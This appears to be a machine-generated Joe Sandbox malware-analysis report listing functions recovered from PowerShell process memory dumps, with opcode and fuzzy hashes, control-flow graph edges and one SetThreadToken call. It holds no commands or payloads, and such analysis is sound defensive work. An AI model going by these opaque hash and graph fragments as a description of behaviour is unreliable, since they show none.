                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8740000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3254676861-0
                                                                                                                                                                                                                                                • Opcode ID: 89a07165929f5020e00bfd317362702fa35fd2e3c2e041d374d079701ab3076a
                                                                                                                                                                                                                                                • Instruction ID: 0cd07bb771d84df41cacf3715ce33d76cb470e492d4ffaeb80380b5aea8b11eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89a07165929f5020e00bfd317362702fa35fd2e3c2e041d374d079701ab3076a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B21128719003488FDB10CF9AC884BDEFBF4EF48224F24846AD419A7350C775A945CFA5
                                                                                                                                                                                                                                                Function 08747160 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 7 8747160-87471cf SetThreadToken 9 87471d1-87471d7 7->9 10 87471d8-87471f5 7->10 9->10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetThreadToken.KERNELBASE(?), ref: 087471C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1479916663.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8740000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3254676861-0
                                                                                                                                                                                                                                                • Opcode ID: 2810ac7a18e6a4a44e842fe7b28b6f731cf9e65528c1115cc62bb9b784f7dcd6
                                                                                                                                                                                                                                                • Instruction ID: a48340606cc6b2158927599ecbccfbe0997d1143b1febba57bf47fe24bd4e786
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2810ac7a18e6a4a44e842fe7b28b6f731cf9e65528c1115cc62bb9b784f7dcd6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F01106B59003488FDB10DF9AC884BDEFBF8EB88224F14846AD419A7750C775A944CFA5
                                                                                                                                                                                                                                                Function 075D2308 Relevance: .7, Instructions: 680COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1478129165.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_75d0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dd46b05beef6afc6753239bf763c66977c8ec01b3668d8352087e0b4280697a1
                                                                                                                                                                                                                                                • Instruction ID: 1695fbfd2bf29d196ed5470eefc391bd397bb27e66ec5b3dfb6125da1ebe21c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd46b05beef6afc6753239bf763c66977c8ec01b3668d8352087e0b4280697a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2532E8B1B043469FEB358BAC98447EABBE1BF86211F1484ABD405CF251DB35DC45CBA2
                                                                                                                                                                                                                                                Function 075D3CE8 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 226 75d3ce8-75d3d0d 227 75d3f00-75d3f4a 226->227 228 75d3d13-75d3d18 226->228 236 75d40ce-75d40e5 227->236 237 75d3f50-75d3f55 227->237 229 75d3d1a-75d3d20 228->229 230 75d3d30-75d3d34 228->230 232 75d3d24-75d3d2e 229->232 233 75d3d22 229->233 234 75d3d3a-75d3d3c 230->234 235 75d3eb0-75d3eba 230->235 232->230 233->230 240 75d3d4c 234->240 241 75d3d3e-75d3d4a 234->241 238 75d3ebc-75d3ec5 235->238 239 75d3ec8-75d3ece 235->239 256 75d40e7-75d40ec 236->256 257 75d4113-75d411d 236->257 243 75d3f6d-75d3f71 237->243 244 75d3f57-75d3f5d 237->244 245 75d3ed4-75d3ee0 239->245 246 75d3ed0-75d3ed2 239->246 242 75d3d4e-75d3d50 240->242 241->242 242->235 248 75d3d56-75d3d75 242->248 253 75d3f77-75d3f79 243->253 254 75d4080-75d408a 243->254 249 75d3f5f 244->249 250 75d3f61-75d3f6b 244->250 251 75d3ee2-75d3efd 245->251 246->251 288 75d3d85 248->288 289 75d3d77-75d3d83 248->289 249->243 250->243 258 75d3f89 253->258 259 75d3f7b-75d3f87 253->259 260 75d408c-75d4094 254->260 261 75d4097-75d409d 254->261 270 75d40ee-75d4112 256->270 271 75d407b-75d407d 256->271 262 75d411f-75d4125 257->262 263 75d4135-75d4139 257->263 264 75d3f8b-75d3f8d 258->264 259->264 266 75d409f-75d40a1 261->266 267 75d40a3-75d40af 261->267 272 75d4129-75d4133 262->272 273 75d4127 262->273 276 75d413f-75d4141 263->276 277 75d41da-75d41e4 263->277 264->254 274 75d3f93-75d3fb2 264->274 275 75d40b1-75d40cb 266->275 267->275 270->257 278 75d4228-75d425d 270->278 272->263 273->263 313 75d3fb4-75d3fc0 274->313 314 75d3fc2 274->314 282 75d4151 276->282 283 75d4143-75d414f 276->283 284 75d41e6-75d41ee 277->284 285 75d41f1-75d41f7 277->285 296 75d425f-75d4281 278->296 297 75d428b-75d4295 278->297 292 75d4153-75d4155 282->292 283->292 293 75d41fd-75d4209 285->293 294 75d41f9-75d41fb 285->294 295 75d3d87-75d3d89 288->295 289->295 292->277 298 75d415b-75d415d 292->298 299 75d420b-75d4225 293->299 294->299 295->235 301 75d3d8f-75d3d96 295->301 335 75d42d5-75d42fe 296->335 336 75d4283-75d4288 296->336 305 75d429f-75d42a5 297->305 306 75d4297-75d429c 297->306 303 75d415f-75d4165 298->303 304 75d4177-75d417e 298->304 301->227 315 75d3d9c-75d3da1 301->315 317 75d4169-75d4175 303->317 318 75d4167 303->318 311 75d4196-75d41d7 304->311 312 75d4180-75d4186 304->312 308 75d42ab-75d42b7 305->308 309 75d42a7-75d42a9 305->309 319 75d42b9-75d42d2 308->319 309->319 320 75d4188 312->320 321 75d418a-75d4194 312->321 323 75d3fc4-75d3fc6 313->323 314->323 324 75d3db9-75d3dc8 315->324 325 75d3da3-75d3da9 315->325 317->304 318->304 320->311 321->311 323->254 328 75d3fcc-75d4003 323->328 324->235 340 75d3dce-75d3dec 324->340 329 75d3dad-75d3db7 325->329 330 75d3dab 325->330 350 75d401d-75d4024 328->350 351 75d4005-75d400b 328->351 329->324 330->324 347 75d432d-75d435c 335->347 348 75d4300-75d4326 335->348 340->235 352 75d3df2-75d3e17 340->352 362 75d435e-75d437b 347->362 363 75d4395-75d439f 347->363 348->347 356 75d403c-75d407a 350->356 357 75d4026-75d402c 350->357 354 75d400d 351->354 355 75d400f-75d401b 351->355 352->235 375 75d3e1d-75d3e24 352->375 354->350 355->350 356->271 360 75d402e 357->360 361 75d4030-75d403a 357->361 360->356 361->356 376 75d437d-75d438f 362->376 377 75d43e5-75d43ea 362->377 367 75d43a8-75d43ae 363->367 368 75d43a1-75d43a5 363->368 372 75d43b4-75d43c0 367->372 373 75d43b0-75d43b2 367->373 374 75d43c2-75d43e2 372->374 373->374 379 75d3e6a-75d3e9d 375->379 380 75d3e26-75d3e41 375->380 376->363 377->376 392 75d3ea4-75d3ead 379->392 386 75d3e5b-75d3e5f 380->386 387 75d3e43-75d3e49 380->387 391 75d3e66-75d3e68 386->391 389 75d3e4d-75d3e59 387->389 390 75d3e4b 387->390 389->386 390->386 391->392
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1478129165.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_75d0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c9420afe620d85a4ff9d424eb9d5c77af2f115622562cdafda3e0658fbbc77a4
                                                                                                                                                                                                                                                • Instruction ID: 47d95e67a63e58ce20d0a277a146424e255c919ad70cb30f493966292c41d526
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9420afe620d85a4ff9d424eb9d5c77af2f115622562cdafda3e0658fbbc77a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 281227B1B04356DFDB259B6C98107EABBA2BF96211F14807BD905CF291DB35CC42C7A2
                                                                                                                                                                                                                                                Function 046BE7B8 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 581 46be7b8-46be7d8 582 46be7da-46be7dc 581->582 583 46be7e1-46be7ee 581->583 584 46beb41-46beb48 582->584 586 46be7f0-46be801 583->586 588 46be803-46be825 call 46b014c 586->588 593 46be82b 588->593 594 46be988-46be99f 588->594 595 46be82d-46be83e 593->595 602 46bea7b-46bea87 594->602 603 46be9a5 594->603 598 46be840-46be842 595->598 600 46be85c-46be8e5 598->600 601 46be844-46be84a 598->601 629 46be8ec-46be921 600->629 630 46be8e7 600->630 604 46be84e-46be85a 601->604 605 46be84c 601->605 609 46beb39 602->609 610 46bea8d-46beaa4 602->610 606 46be9a7-46be9b8 603->606 604->600 605->600 613 46be9ba-46be9bc 606->613 609->584 610->609 625 46beaaa 610->625 616 46be9be-46be9c4 613->616 617 46be9d6-46bea0e 613->617 619 46be9c8-46be9d4 616->619 620 46be9c6 616->620 634 46bea10 617->634 635 46bea15-46bea4a 617->635 619->617 620->617 627 46beaac-46beabd 625->627 633 46beabf-46beac1 627->633 648 46be92b 629->648 649 46be923 629->649 630->629 636 46beadb-46beb09 633->636 637 46beac3-46beac9 633->637 634->635 651 46bea4c 635->651 652 46bea54 635->652 655 46beb0b-46beb16 636->655 656 46beb35-46beb37 636->656 639 46beacb 637->639 640 46beacd-46bead9 637->640 639->636 640->636 648->594 649->648 651->652 652->602 661 46beb19 call 46be7a8 655->661 662 46beb19 call 46be7b8 655->662 663 46beb19 call 46be92e 655->663 664 46beb19 call 46bea57 655->664 656->584 658 46beb1f-46beb33 658->655 658->656 661->658 662->658 663->658 664->658
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6714ea69db3c834ec5b0357e43603baa03bb00ed0f9775315a820d91c0a0fb9a
                                                                                                                                                                                                                                                • Instruction ID: 0e09878dfb0b421c730feaf1078df399197cd952d4a9e654fc6920d44a6fda44
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6714ea69db3c834ec5b0357e43603baa03bb00ed0f9775315a820d91c0a0fb9a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB916D34B102148FDB14DF68D5946EEBBF6AF88710B158069D842EB355EF35EC82CB91
                                                                                                                                                                                                                                                Function 046B29F0 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 729 46b29f0-46b2a1e 730 46b2af5-46b2b37 729->730 731 46b2a24-46b2a3a 729->731 735 46b2b3d-46b2b56 730->735 736 46b2c51-46b2c61 730->736 732 46b2a3f-46b2a52 731->732 733 46b2a3c 731->733 732->730 740 46b2a58-46b2a65 732->740 733->732 738 46b2b5b-46b2b69 735->738 739 46b2b58 735->739 738->736 746 46b2b6f-46b2b79 738->746 739->738 742 46b2a6a-46b2a7c 740->742 743 46b2a67 740->743 742->730 747 46b2a7e-46b2a88 742->747 743->742 748 46b2b7b-46b2b7d 746->748 749 46b2b87-46b2b94 746->749 751 46b2a8a-46b2a8c 747->751 752 46b2a96-46b2aa6 747->752 748->749 749->736 750 46b2b9a-46b2baa 749->750 753 46b2baf-46b2bbd 750->753 754 46b2bac 750->754 751->752 752->730 755 46b2aa8-46b2ab2 752->755 753->736 759 46b2bc3-46b2bd3 753->759 754->753 756 46b2ac0-46b2af4 755->756 757 46b2ab4-46b2ab6 755->757 757->756 761 46b2bd8-46b2be5 759->761 762 46b2bd5 759->762 761->736 765 46b2be7-46b2bf1 761->765 762->761 766 46b2bf7 765->766 767 46b2bf9 766->767 768 46b2bfc-46b2c08 766->768 767->768 768->736 770 46b2c0a-46b2c18 768->770 772 46b2c1a-46b2c24 770->772 773 46b2bf2-46b2bf5 770->773 774 46b2c29 772->774 775 46b2c26 772->775 773->766 776 46b2c2e-46b2c38 774->776 775->774 777 46b2c3d-46b2c50 776->777
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1719f9afd179c7e0bea967498bad5593c3b1b197921c80e4cd29ff77f801087f
                                                                                                                                                                                                                                                • Instruction ID: 7c189f5d5e86014504674725c5930e9c88a7019c458f6859324a995f6115c7b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1719f9afd179c7e0bea967498bad5593c3b1b197921c80e4cd29ff77f801087f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E918B74A00205CFCB16CF58C4A8AAAFBF1FF48310B258599D955AB364D736FC91CBA0
                                                                                                                                                                                                                                                Function 046B7740 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 912 46b7740-46b7776 915 46b7778-46b777a 912->915 916 46b777f-46b7788 912->916 917 46b7829-46b782e 915->917 919 46b778a-46b778c 916->919 920 46b7791-46b77af 916->920 919->917 923 46b77b1-46b77b3 920->923 924 46b77b5-46b77b9 920->924 923->917 925 46b77bb-46b77c0 924->925 926 46b77c8-46b77cf 924->926 925->926 927 46b782f-46b7860 926->927 928 46b77d1-46b77fa 926->928 940 46b78e2-46b78e6 927->940 941 46b7866-46b78bd 927->941 931 46b7808 928->931 932 46b77fc-46b7806 928->932 934 46b780a-46b7816 931->934 932->934 938 46b7818-46b781a 934->938 939 46b781c-46b7823 934->939 938->917 939->917 952 46b78e9 call 46b7932 940->952 953 46b78e9 call 46b7940 940->953 948 46b78c9-46b78d7 941->948 949 46b78bf 941->949 943 46b78ec-46b78f1 948->940 951 46b78d9-46b78e1 948->951 949->948 952->943 953->943
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9d419ee3aac805055f76b6ff2ee0a7376c8f66503fff1e264b2dd018cfa49cb8
                                                                                                                                                                                                                                                • Instruction ID: b619accfbd4e35bb2bc1000a91447f5fddb6c8c8b07f1efbc02f9b988f374f63
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d419ee3aac805055f76b6ff2ee0a7376c8f66503fff1e264b2dd018cfa49cb8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2851C1303042059FD704DBB9D854AAA77EAFFC9226B1484BAD549DB352EB31EC41CBE0
                                                                                                                                                                                                                                                Function 046BBAC0 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 954 46bbac0-46bbb50 958 46bbb52 954->958 959 46bbb56-46bbb61 954->959 958->959 960 46bbb63 959->960 961 46bbb66-46bbbc0 call 46baf98 959->961 960->961 968 46bbbc2-46bbbc7 961->968 969 46bbc11-46bbc15 961->969 968->969 970 46bbbc9-46bbbec 968->970 971 46bbc17-46bbc21 969->971 972 46bbc26 969->972 974 46bbbf2-46bbbfd 970->974 971->972 973 46bbc2b-46bbc2d 972->973 975 46bbc2f-46bbc50 973->975 976 46bbc52-46bbc55 call 46ba978 973->976 977 46bbbff-46bbc05 974->977 978 46bbc06-46bbc0f 974->978 981 46bbc5a-46bbc5e 975->981 976->981 977->978 978->973 983 46bbc60-46bbc89 981->983 984 46bbc97-46bbcc6 981->984 983->984
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 41d75c1eaabc27e0f711a8f1b139226677a91b4c6670acf726e59ee4abe0aaed
                                                                                                                                                                                                                                                • Instruction ID: 0ebb564d833d4a258bb501f8971fe90a9f8afe4dd1313215017f5d8ee8667712
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41d75c1eaabc27e0f711a8f1b139226677a91b4c6670acf726e59ee4abe0aaed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7161F771E012489FDB15CFA9C584BDDBBF1EF88710F148129E819AB354EB34AD81CB94
                                                                                                                                                                                                                                                Function 046BBAB0 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1047 46bbab0-46bbb50 1051 46bbb52 1047->1051 1052 46bbb56-46bbb61 1047->1052 1051->1052 1053 46bbb63 1052->1053 1054 46bbb66-46bbbc0 call 46baf98 1052->1054 1053->1054 1061 46bbbc2-46bbbc7 1054->1061 1062 46bbc11-46bbc15 1054->1062 1061->1062 1063 46bbbc9-46bbbec 1061->1063 1064 46bbc17-46bbc21 1062->1064 1065 46bbc26 1062->1065 1067 46bbbf2-46bbbfd 1063->1067 1064->1065 1066 46bbc2b-46bbc2d 1065->1066 1068 46bbc2f-46bbc50 1066->1068 1069 46bbc52-46bbc55 call 46ba978 1066->1069 1070 46bbbff-46bbc05 1067->1070 1071 46bbc06-46bbc0f 1067->1071 1074 46bbc5a-46bbc5e 1068->1074 1069->1074 1070->1071 1071->1066 1076 46bbc60-46bbc89 1074->1076 1077 46bbc97-46bbcc6 1074->1077 1076->1077
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fa32de437a3ac772a7547646110400840fd0a2ff4365f1d9381a6e344e475520
                                                                                                                                                                                                                                                • Instruction ID: c23c241ce423a4754ab2c7dd3524c5e978afbbba1447ac31862c23cf1b9b6cba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa32de437a3ac772a7547646110400840fd0a2ff4365f1d9381a6e344e475520
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2512871E012489FDB15CFA9C584BDDBBF1FF88710F148029E859AB365EB34A885CB91
                                                                                                                                                                                                                                                Function 046BE419 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 51aee671509abbea5f795725e1f82b45a98b439872ed72121161b0cc182872d9
                                                                                                                                                                                                                                                • Instruction ID: 6fda62a27eaf5bfa12981b4931fa0f5fc6eb567f624917e054448837beb4b751
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51aee671509abbea5f795725e1f82b45a98b439872ed72121161b0cc182872d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 465128347003058FDB14DF68C594AAABBF6EFD821471584ADE489DF362EB36EC018B91
                                                                                                                                                                                                                                                Function 046BE428 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f709c23adc8afcc732f54e6dd18195eb9507852a29aefd812cfc559bd00cf468
                                                                                                                                                                                                                                                • Instruction ID: c075184f7fd129b94fdd952e0c8f4a56cafb05a2697a6e78efa2a80f80ba00ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f709c23adc8afcc732f54e6dd18195eb9507852a29aefd812cfc559bd00cf468
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 364126347003098FDB14DF6CC594AAAB7F6AFD8214715846CE889DF356EB35EC018B91
                                                                                                                                                                                                                                                Function 075D3CCC Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1478129165.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_75d0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a0017ce45b8f8c2139e88183ca240f4e14ad7e1bbcc4b43d3345f8673fac8fea
                                                                                                                                                                                                                                                • Instruction ID: 103c3032bd0c7ba0686993581c593de7efb7c627858f673d2e7676e3ed8db823
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0017ce45b8f8c2139e88183ca240f4e14ad7e1bbcc4b43d3345f8673fac8fea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B94106F0A00206DFDB319F2CC5117E67BA2BF8A655F1484AAD8049F292D735DC45CBA3
                                                                                                                                                                                                                                                Function 046B6FE0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2f54b7c7f2ac99890f102a803031cddcabb2f0d2b807ef17059d880be11b871b
                                                                                                                                                                                                                                                • Instruction ID: 5f1506758eea8f20315478896ec76dab14ce7a1f13fc80c9d730b62655bb0684
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f54b7c7f2ac99890f102a803031cddcabb2f0d2b807ef17059d880be11b871b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48414834B146048FDB14DFA4C498AAEBBF2EF8D712F144099E442AB391DB35ED41CB65
                                                                                                                                                                                                                                                Function 046B6FB0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5b357db52dd66b999175d1b6d2c47ae02fe6d4dc56f0a7a9a6df183ff42da2b3
                                                                                                                                                                                                                                                • Instruction ID: ff0ce0a03615f0742d46be91b075cc18e24dbd2a98c5b5cf914aab6289c17f5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b357db52dd66b999175d1b6d2c47ae02fe6d4dc56f0a7a9a6df183ff42da2b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB413C746046498FCB15DBA4C458AEEBBF1EF8A211F1840AAD485EB392DB35AC41CB61
                                                                                                                                                                                                                                                Function 046B2B00 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 487c56b70328d00ea1cd0235d4743ca256f4d9432e5f8dc13c0e665d3d224b1d
                                                                                                                                                                                                                                                • Instruction ID: d8826b25a680d3cc5fd5afb39356f84be7ba15f1d38e509e6e3a0ae93d0bd1fb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 487c56b70328d00ea1cd0235d4743ca256f4d9432e5f8dc13c0e665d3d224b1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A4136B4A00609DFDB06CF48C4A8AAAF7B1FF48310B118599D955AB364D732FC91CBA4
                                                                                                                                                                                                                                                Function 046BE610 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
